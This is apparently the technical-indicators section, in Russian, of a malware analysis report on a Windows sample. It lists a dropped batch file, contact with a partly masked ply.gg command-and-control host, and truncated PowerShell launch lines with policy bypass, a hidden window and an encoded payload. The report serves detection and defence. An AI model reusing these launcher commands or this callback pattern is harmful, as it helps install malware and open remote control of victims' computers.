Техническая информация
- %TEMP%\ixp000.tmp\sdfth.bat
- %TEMP%\ixp000.tmp\sdfth.bat
- '22#.#p.ply.gg':12948
- http://22#.##.ply.gg:12948/JhgBnnDM-EuAcIFx5MBIsQOo7D8LzdaLpaBEF2ZTLSxrm47gvxR9EQJG3CcUgF6YFgsw-vaOqUthpRdVXnchR3aCKrbCM6sxjEqlG4 via 22#.#p.ply.gg
- DNS ASK 22#.#p.ply.gg
- '<SYSTEM32>\cmd.exe' /c "sdfth.bat"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' /c powershell.exe -nop -exec bypass64 -w 3 -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -exec bypass64 -w 3 -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3A...